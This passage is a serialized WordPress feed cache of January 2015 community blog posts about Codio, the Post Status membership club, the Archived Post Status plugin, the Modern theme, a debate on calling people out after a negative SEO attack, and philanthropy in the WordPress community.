href=\"http://wptavern.com/wordpress-in-the-cloud-how-to-set-up-a-development-site-with-koding\" target=\"_blank\">WordPress on Koding</a> in many respects, and I found it equally easy to set up on both services. Both provide a quick way to do some testing, without having to set up a development environment on your local machine. If you decide to experiment and break everything, it&#8217;s safe and easy to start over. Codio&#8217;s friendly environment provides a great way to get your friends or children started with using WordPress.</p>\n<p>Since Codio was developed with educators in mind, the dashboard has a handful of helpful tutorials for learning about Git, an introduction to HTML and CSS, and an introduction Javascript. If one of your 2015 resolutions is to get started learning some technologies outside of WordPress, such as Ruby, Python, or Angular, <a href=\"https://codio.com\" target=\"_blank\">Codio</a> is a great option for getting development environments up and running so that you can start learning right away.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Jan 2015 21:21:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"Post Status: Let’s Grow: Introducing the Post Status Membership Club\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=7492\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://poststatus.com/lets-grow/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3982:\"<p>I&#8217;m overjoyed to share this with you. The <a href=\"https://poststatus.com/club\">Membership Club</a> is open, and on the site&#8217;s two-year anniverary to boot.</p>\n<p>I can&#8217;t wait to share this journey with you.</p>\n<p>The link above is a complete features page where you can see what you&#8217;ll get, as well as choose between a $99 Club Membership or $365 Patron Membership. Both memberships are annual. You pay once, and you get great stuff for a year.</p>\n<p>This wouldn&#8217;t be possible without the terrific partners that are supporting me. Each of these twelve companies has invested hard-earned money into Post Status, and I&#8217;m so thankful.</p>\n<p>They&#8217;ve all committed for a full year. Here they are, in alphabetical order:</p>\n<ul>\n<li><a href=\"https://genesisdesignpro.com/\">Design Palette Pro</a></li>\n<li><a href=\"http://gravityforms.com\">Gravity Forms</a></li>\n<li><a href=\"http://ithemes.com\">iThemes</a></li>\n<li><a href=\"http://optinmonster.com\">OptinMonster</a></li>\n<li><a href=\"http://pippinsplugins.com\">Pippin’s Plugins</a></li>\n<li><a href=\"http://thethemefoundry.com\">The Theme Foundry</a></li>\n<li><a href=\"http://wp101.com\">WP101</a></li>\n<li><a href=\"http://woothemes.com\">WooThemes</a></li>\n<li><a href=\"https://deliciousbrains.com/\">WP Migrate DB Pro</a></li>\n<li><a href=\"http://wpsitecare.com\">WP Site Care</a></li>\n<li><a href=\"http://thewpvalet.com\">WP Valet</a></li>\n<li><a href=\"http://yoast.com\">Yoast</a></li>\n</ul>\n<p>Please check out the <a href=\"https://poststatus.com/partners\">Partners page</a>. Some of them also have their profiles already on the <a href=\"https://poststatus.com/organizations\">Organizations</a> directory as well.</p>\n<p>For those of you that register, you&#8217;ll be able to create a <a href=\"https://poststatus.com/profiles\">Profile</a> of your own. Though it might be a couple weeks before the submissions process is totally fleshed out.</p>\n<p>Profiles and organizations will also be linked from future blog posts, making finding great content and information about those within the WordPress ecosystem easier than ever.</p>\n<p>The Post Status Notes newsletter will begin Monday after PressNomics, where I&#8217;m headed today. I&#8217;ll be publishing there between now and then, but the email starts Monday. Those of you who buy a membership and login can of course see it immediately. The notes I published before today are still visible with direct links as well.</p>\n<p>The resources section is coming soon. I couldn&#8217;t squeeze everything I wanted to do into the initial launch, but I am launching on time.</p>\n<p>There&#8217;s a job board coming as well.</p>\n<p>Finally, most of the partners have deals that they&#8217;re going to share with members. We&#8217;ll get those gathered up and in a central spot on the member side of the site real soon.</p>\n<p>For companies that aren&#8217;t partners but want to be involved, consider the job board and the Patron memberships your opportunity to show support for the site.</p>\n<p>Thank you, everyone, for your support and for making this site possible. This is definitely an alpha version of what I want Post Status to be, but I&#8217;m so proud of what I&#8217;ve been able to make live so far, and I&#8217;m thrilled that this gets to be what I do every day.</p>\n<p>For those of you on the fence about whether this is a good value: I know what you mean. It&#8217;s a newsletter, some resources, and some deals. It&#8217;s $99. Not cheap (but not too expensive either).</p>\n<p><strong>I promise you this:</strong> I will work harder than ever to build out the available resources and offer you content and insight you can&#8217;t find anywhere else. That&#8217;s my pledge.</p>\n<p>I&#8217;ve been writing about WordPress for coming on five years, and I am in it for the long haul. I hope you all will join me, so that we can grow together.</p>\n<p>Now, go check out the <a href=\"https://poststatus.com/club\">Club page</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Jan 2015 20:21:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Matt: Where dreams go\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2015/01/where-dreams-go/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"http://ma.tt/2015/01/where-dreams-go/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:263:\"<blockquote><p>Within your heart keep one still, secret spot where dreams may go, and sheltered so, may thrive and grow where doubt and fear are not. Oh, keep a place within your heart, for little dreams to go.</p></blockquote>\n<p>&#8212;&nbsp;Louise Driscoll</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Jan 2015 05:46:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Archive WordPress Content with the Archived Post Status Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37591\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/archive-wordpress-content-with-the-archived-post-status-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5260:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/archived-post-status.jpg\" rel=\"prettyphoto[37591]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/archived-post-status.jpg?resize=772%2C310\" alt=\"archived-post-status\" class=\"aligncenter size-full wp-image-37597\" /></a></p>\n<p>WordPress plugin developer <a href=\"http://frankiejarrett.com/\" target=\"_blank\">Frankie Jarrett</a> has been on a roll this month, pumping out plugin releases on WordPress.org. Last year, Jarrett <a href=\"http://frankiejarrett.com/parting-ways-churchthemes-net-looking-ahead-toward-brighter-future/\" target=\"_blank\">sold ChurchThemes.net to Lift</a> co-founders Chris Wallace and Brad Miller. Since that time he has been focusing on product development for <a href=\"https://wp-stream.com/\" target=\"_blank\">WP Stream</a>, which has allowed him a few extra minutes to create some free extensions for WordPress.</p>\n<p>At the end of December and in early January, he released five small but highly useful plugins:</p>\n<ul>\n<li><a href=\"https://wordpress.org/plugins/compact-view-mode/\" target=\"_blank\">Compact View Mode</a></li>\n<li><a href=\"https://wordpress.org/plugins/user-session-control/\" target=\"_blank\">User Session Control</a></li>\n<li><a href=\"https://wordpress.org/plugins/prevent-concurrent-logins/\" target=\"_blank\">Prevent Concurrent Logins</a></li>\n<li><a href=\"https://wordpress.org/plugins/json-rest-api-force-ssl/\" target=\"_blank\">JSON REST API Force SSL</a></li>\n<li><a href=\"https://wordpress.org/plugins/archived-post-status/\" target=\"_blank\">Archived Post Status</a></li>\n</ul>\n<p>Several of his latest creations are handy for membership sites and web applications. <a href=\"https://wordpress.org/plugins/archived-post-status/\" target=\"_blank\">Archived Post Status</a> caught my eye, because adds more flexibility for using WordPress as a CMS. The plugin adds a new post status that enables posts and pages to be archived. This effectively allows you to unpublish content without having to send it back to draft status.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/archived-post-status-dropdown.png\" rel=\"prettyphoto[37591]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/archived-post-status-dropdown.png?resize=600%2C400\" alt=\"archived-post-status-dropdown\" class=\"aligncenter size-full wp-image-37611\" /></a></p>\n<p>WordPress&#8217; default <a href=\"http://codex.wordpress.org/Post_Status\" target=\"_blank\">post statuses</a> currently work very much like an on/off switch as far as a finished post is concerned. Of the eight default statuses, Published is the only one that is public, while all the rest remain behind the curtain in various states of unreadiness. None of the statuses, apart from Published, adequately indicate that a post is complete or finished.</p>\n<p>Fortunately, WordPress makes it possible for developers to register their own <a href=\"http://codex.wordpress.org/Post_Status#Custom_Status\" target=\"_blank\">custom post statuses</a>, which is what Jarrett did with this plugin. He created it for sites where content is not always meant to be evergreen. It allows you to archive posts in the same way that you might archive email.</p>\n<p>Archived Post Status is compatible with posts, pages, and custom post types, giving you a wide array of possible use cases:</p>\n<ul>\n<li>Archive pages or posts from a conference or event for editing and re-use next year</li>\n<li>Archive real estate listings for records</li>\n<li>Cycle portfolio content in and out of the site as necessary</li>\n<li>Temporarily remove listings from a site that indexes businesses or organizations</li>\n<li>Archive products to bring back for future use</li>\n</ul>\n<p>While custom post types seem to be one of the most likely uses for this plugin, you may not want to have the archived status available to all post types. Jarrett includes a <a href=\"https://wordpress.org/plugins/archived-post-status/faq/\" target=\"_blank\">filter</a> that allows you to exclude the Archived status from appearing on certain post types.</p>\n<p>Some might be wondering why you wouldn&#8217;t use the Draft status, since the Archived post status essentially puts a post in the same state. To use drafts in this way would be to split its purpose into multiple uses, which are not clearly separated when sorting. If you are looking for previously published content that is complete, while hunting through all drafts in progress, you have to be fully knowledgeable of all the content on the site and use your memory to do the sorting. The archived status keeps everything nicely sorted for future use.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/archived-posts-list-screen.png\" rel=\"prettyphoto[37591]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/archived-posts-list-screen.png?resize=600%2C400\" alt=\"archived-posts-list-screen\" class=\"aligncenter size-full wp-image-37614\" /></a></p>\n<p>If you need a non-public archive of completed posts, this simple plugin will do the trick. I tested it and works exactly as advertised. Download <a href=\"https://wordpress.org/plugins/archived-post-status/\" target=\"_blank\">Archived Post Status</a> from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Jan 2015 01:29:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: Modern: A Beautiful Free Blog and Portfolio Theme for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37303\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/modern-a-beautiful-free-blog-and-portfolio-theme-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4293:\"<p>In just one week since its release, the new <a href=\"https://wordpress.org/themes/modern\" target=\"_blank\">Modern</a> theme was downloaded nearly 2,700 times from WordPress.org. It was created by <a href=\"http://www.webmandesign.eu/\" target=\"_blank\">WebMan Design</a>, a Slovakia-based company founded by Oliver Juhas. WebMan Design has been selling WordPress themes across multiple marketplaces since 2012 and recently began focusing on producing future-proof themes that meet WordPress.org standards.</p>\n<p>Modern is the company&#8217;s second free theme on WordPress.org, following the <a href=\"https://wordpress.org/themes/mustang-lite\" target=\"_blank\">Mustang Lite</a> business theme released last year. It was designed for personal and small business portfolios.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/modern.jpg\" rel=\"prettyphoto[37303]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/modern.jpg?resize=880%2C660\" alt=\"modern\" class=\"aligncenter size-full wp-image-37554\" /></a></p>\n<p>Modern&#8217;s bold style incorporates a fullscreen header slideshow that is perfect for showcasing large images with header text. The homepage features your latest blog posts along with an optional sortable portfolio section. The header includes two menu locations for the primary navigation and the social links menu.</p>\n<p>All of the customization options for the theme are built into WordPress&#8217; native customizer, including the following:</p>\n<ul>\n<li>Add your own 1920 × 1080 header image</li>\n<li>Footer widget area</li>\n<li>Color picker to set background color, text color, accent color, and accent text color</li>\n<li>Customize predefined texts on the homepage</li>\n<li>Typography options for setting logo font, heading font, general text font, font subset, basic font size</li>\n</ul>\n<p>Modern offers unique styles for each of WordPress&#8217; default <a href=\"http://codex.wordpress.org/Post_Formats\" target=\"_blank\">post formats</a>. The demo&#8217;s <a href=\"http://themedemos.webmandesign.eu/modern/style-guide/\" target=\"_blank\">style guide</a> page shows that the theme author took many of the smaller details into consideration, including code formatting, blockquotes, lists, table styles, highlighted text style, image alignment, Jetpack Mosaic galleries and more.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/post-formats.jpg\" rel=\"prettyphoto[37303]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/post-formats.jpg?resize=1025%2C617\" alt=\"post-formats\" class=\"aligncenter size-full wp-image-37575\" /></a></p>\n<p>The heart icons you see in the single post meta are powered by the free <a href=\"http://www.themezilla.com/plugins/zillalikes\" target=\"_blank\">ZillaLikes plugin</a> from ThemeZilla. Modern includes support for Jetpack to manage the portfolio posts, logo image, and uses its featured content module to power the homepage banner. It also includes support for <a href=\"http://schema.org/\" target=\"_blank\">Schema.org</a> markup and <a href=\"https://github.com/zamoose/themehookalliance\" target=\"_blank\">Theme Hook Alliance</a> action hooks.</p>\n<p>WebMan Design developed the theme with performance in mind and links to <a href=\"http://tools.pingdom.com/fpt/#!/bHfVKJ/http://themedemos.webmandesign.eu/modern/\" target=\"_blank\">Pingdom</a> results of load tests for the demo site. The demo site takes 1.73s to load and gets a 94/100 performance grade.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/theme-demo-performance.jpg\" rel=\"prettyphoto[37303]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/theme-demo-performance.jpg?resize=631%2C235\" alt=\"theme-demo-performance\" class=\"aligncenter size-full wp-image-37567\" /></a></p>\n<p>Check out a <a href=\"http://themedemos.webmandesign.eu/modern/\" target=\"_blank\">live demo</a> of the Modern theme in action. WebMan Design has created extensive <a href=\"http://www.webmandesign.eu/manual/modern/\" target=\"_blank\">documentation</a> for the theme, its various styles, and available third-party plugin integrations. <a href=\"https://wordpress.org/themes/modern\" target=\"_blank\">Modern</a> is available for download from WordPress.org or via your admin themes browser.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 20 Jan 2015 21:37:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"WPTavern: Calling People Out in the WordPress Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37545\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"http://wptavern.com/calling-people-out-in-the-wordpress-community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3289:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/NameandShameFeaturedImage.png\" rel=\"prettyphoto[37545]\"><img class=\"size-full wp-image-37564\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/NameandShameFeaturedImage.png?resize=638%2C288\" alt=\"Name and Shame Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/66662429@N07/8065770370/\">Adarsh A</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-nc-sa/2.0/\">cc</a>\n<p>The founder of <a title=\"http://www.wpsitecare.com/\" href=\"http://www.wpsitecare.com/\">WP Site Care</a>, Ryan Sullivan, <a title=\"http://www.ryandsullivan.com/negative-seo/\" href=\"http://www.ryandsullivan.com/negative-seo/\">explains </a>how a negative SEO campaign nearly took his business offline. Sullivan shares details behind the attack, how it affected the bottom line, and says it was someone in the WordPress community who orchestrated the attack.</p>\n<blockquote><p>Using some sophisticated techniques we were able to trace back to the source of the spam attack and unfortunately found out that the attack was started by someone within the WordPress community.</p>\n<p>They did everything through a third-party, an internet hitman of sorts, to try to cover their tracks, but they weren’t quite careful enough and we were able to uncover where everything started.</p></blockquote>\n<p>Instead of naming the individual, Sullivan left a message aimed specifically at the person responsible, &#8220;The only reason I even mention it is so that hopefully, that person reads this, and knows that what they’re doing is impacting the livelihood’s of people and their families.&#8221; It&#8217;s this message which has me wondering, is it time to name and shame people in the WordPress community?</p>\n<h2>The Good</h2>\n<p>In my experience, the community rarely calls people out, even if they have <a title=\"http://womenofwp.org/2014/01/how-to-report-harassment-at-wordcamps/\" href=\"http://womenofwp.org/2014/01/how-to-report-harassment-at-wordcamps/\">routinely harassed others</a> at a WordCamp. Instead, we usually find out about them through back channels. By calling people out, it warns others and makes everyone aware of the situation.</p>\n<h2>The Bad</h2>\n<p>Naming and shaming creates the potential for libel and defamation lawsuits. The internet has a long memory and if a person changes for the better, it will be hard to forget mistakes made in the past. It could hurt future employment opportunities as employers do background checks using Google. There&#8217;s likely a lot of unintended consequences as well.</p>\n<h2>Judge and Jury</h2>\n<p>I doubt the community will start calling people out, as it creates anger, grief, and drama. Besides, who are we to act as judge and jury? However, it bothers me to know that an unnamed person is negatively impacting the livelihood of WordPress businesses and people.</p>\n<p>On one hand, I want to see the individual dealt with in the public sphere and turned into an example. On the other, I feel it&#8217;s probably not the best way to go about it. Maybe the system already in place is the best way to handle these types of situations? Write a post, raise awareness, and tell others who to watch out for in the back channel. What do you think?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 20 Jan 2015 20:41:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Matt: Not the Only One\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44610\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/01/not-the-only-one/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:139:\"<p>I know I&#8217;m like a year late on Sam Smith, but his voice on this is so amazing and haunting, it&#8217;s a perfect song.</p>\n<p></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 20 Jan 2015 06:35:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"WPTavern: The Philanthropic Side of The WordPress Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37461\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"http://wptavern.com/the-philanthropic-side-of-the-wordpress-community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14236:\"<p>Whether it&#8217;s businesses participating in charity work or individuals who need financial assistance, the WordPress community has repeatedly shown how generous it is. Here&#8217;s at look at some WordPress businesses that participate in philanthropy and individuals who experienced the community&#8217;s generosity first hand.</p>\n<h2>Matt Mullenweg Co-creator of WordPress</h2>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/CharityWaterImage.png\" rel=\"prettyphoto[37461]\"><img class=\"aligncenter size-full wp-image-37503\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/CharityWaterImage.png?resize=874%2C561\" alt=\"CharityWater Image\" /></a></p>\n<p>Matt Mullenweg is a strong believer in providing easy access to clean drinking water to regions of the world who need it most. He works with several charities and organizations including:</p>\n<ul>\n<li><a href=\"http://archive.org/\">Archive.org</a></li>\n<li><a href=\"http://www.alaskawild.org/\">Alaska Wilderness League</a></li>\n<li><a href=\"http://apache.org/\">Apache Foundation</a></li>\n<li><a href=\"http://thebaylights.org/\">Bay Lights</a></li>\n<li><a href=\"http://charitywater.org/\">charity: water</a></li>\n<li><a href=\"http://eff.org/\">Electronic Frontier Foundation</a></li>\n<li><a href=\"http://grist.org/\">Grist</a> (board member)</li>\n<li><a href=\"http://www.innocenceproject.org/\">Innocence Project</a></li>\n<li><a href=\"http://longnow.org/\">Long Now 